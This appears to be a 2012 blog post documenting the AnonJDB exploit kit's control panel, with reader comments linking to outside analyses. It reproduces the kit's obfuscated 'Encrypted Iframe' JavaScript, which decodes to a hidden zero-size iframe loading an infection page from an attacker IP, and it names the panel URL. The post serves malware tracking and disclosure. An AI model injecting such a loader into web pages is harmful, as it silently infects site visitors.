Sunday, 22 July 2012

AnonJDB

Advert:

Login:

Overview:

Stats:

Iframe Generator:

Encrypted Iframe:
<script>var UQPC0r2no6qVVr = 'UQPC0r2no6qVVr3cUQPC0r2no6qVVr69UQPC0r2no6qVVr66UQPC0r2no6qVVr72UQPC0r2no6qVVr61UQPC0r2no6qVVr6dUQPC0r2no6qVVr65UQPC0r2no6qVVr20UQPC0r2no6qVVr73UQPC0r2no6qVVr72UQPC0r2no6qVVr63UQPC0r2no6qVVr3dUQPC0r2no6qVVr22UQPC0r2no6qVVr68UQPC0r2no6qVVr74UQPC0r2no6qVVr74UQPC0r2no6qVVr70UQPC0r2no6qVVr3aUQPC0r2no6qVVr2fUQPC0r2no6qVVr2fUQPC0r2no6qVVr31UQPC0r2no6qVVr37UQPC0r2no6qVVr36UQPC0r2no6qVVr2eUQPC0r2no6qVVr33UQPC0r2no6qVVr31UQPC0r2no6qVVr2eUQPC0r2no6qVVr37UQPC0r2no6qVVr32UQPC0r2no6qVVr2eUQPC0r2no6qVVr39UQPC0r2no6qVVr36UQPC0r2no6qVVr2fUQPC0r2no6qVVr6aUQPC0r2no6qVVr64UQPC0r2no6qVVr62UQPC0r2no6qVVr2fUQPC0r2no6qVVr69UQPC0r2no6qVVr6eUQPC0r2no6qVVr66UQPC0r2no6qVVr2eUQPC0r2no6qVVr70UQPC0r2no6qVVr68UQPC0r2no6qVVr70UQPC0r2no6qVVr3fUQPC0r2no6qVVr69UQPC0r2no6qVVr64UQPC0r2no6qVVr3dUQPC0r2no6qVVr31UQPC0r2no6qVVr36UQPC0r2no6qVVr30UQPC0r2no6qVVr37UQPC0r2no6qVVr30UQPC0r2no6qVVr34UQPC0r2no6qVVr63UQPC0r2no6qVVr34UQPC0r2no6qVVr35UQPC0r2no6qVVr30UQPC0r2no6qVVr64UQPC0r2no6qVVr36UQPC0r2no6qVVr62UQPC0r2no6qVVr32UQPC0r2no6qVVr62UQPC0r2no6qVVr34UQPC0r2no6qVVr34UQPC0r2no6qVVr65UQPC0r2no6qVVr33UQPC0r2no6qVVr64UQPC0r2no6qVVr33UQPC0r2no6qVVr64UQPC0r2no6qVVr37UQPC0r2no6qVVr35UQPC0r2no6qVVr35UQPC0r2no6qVVr39UQPC0r2no6qVVr39UQPC0r2no6qVVr66UQPC0r2no6qVVr33UQPC0r2no6qVVr36UQPC0r2no6qVVr38UQPC0r2no6qVVr30UQPC0r2no6qVVr22UQPC0r2no6qVVr20UQPC0r2no6qVVr77UQPC0r2no6qVVr69UQPC0r2no6qVVr64UQPC0r2no6qVVr74UQPC0r2no6qVVr68UQPC0r2no6qVVr3dUQPC0r2no6qVVr22UQPC0r2no6qVVr30UQPC0r2no6qVVr22UQPC0r2no6qVVr20UQPC0r2no6qVVr68UQPC0r2no6qVVr65UQPC0r2no6qVVr69UQPC0r2no6qVVr67UQPC0r2no6qVVr68UQPC0r2no6qVVr74UQPC0r2no6qVVr3dUQPC0r2no6qVVr22UQPC0r2no6qVVr30UQPC0r2no6qVVr22UQPC0r2no6qVVr20UQPC0r2no6qVVr66UQPC0r2no6qVVr72UQPC0r2no6qVVr61UQPC0r2no6qVVr6dUQPC0r2no6qVVr65UQPC0r2no6qVVr62UQPC0r2no6qVVr6fUQPC0r2no6qVVr72UQPC0r2no6qVVr64UQPC0r2no6qVVr65UQPC0r2no6qVVr72UQPC0r2no6qVVr3dUQPC0r2no6qVVr22UQPC0r2no6qVVr30UQPC0r2no6qVVr22UQPC0r2no6qVVr3eUQPC0r2no6qVVr3cUQPC0r2no6qVVr2fUQPC0r2no6qVVr69UQPC0r2no6qVVr66UQPC0r2no6qVVr72UQPC0r2no6qVVr61UQPC0r2no6qVVr6dUQPC0r2no6qVVr65UQPC0r2no6qVVr3e'; vC05HXIZhrBMCB = UQPC0r2no6qVVr.replace(/UQPC0r2no6qVVr/g,'%');document.write(unescape(vC05HXIZhrBMCB));</script>



Settings:

http://anonproducts.in/jdb/panel.php
• dns: 1 » ip: 176.31.72.96 - adresse: ANONPRODUCTS.IN

5 comments:

  1. what's the password to panel.php?

    ReplyDelete
    Replies
    1. you probably don't belong here

      Delete
  2. Just me our ? after BL2 released they started to popup from no where all thoose JDB stuff :)

    ReplyDelete
  3. If you can get me the JAR of the driveby, I can decompile it for you into its original state.

    ReplyDelete
  4. Xylit0l. Here's more, landing page, jar, payloads, infection scheme.
    http://malwaremustdie.blogspot.jp/2013/01/peeking-at-jdb-exploit-kit-infector.html
    http://malwaremustdie.blogspot.jp/2013/02/peeking-at-anon-jdb-exploit-kit-jar.html
    #MalwareMustDie!

    ReplyDelete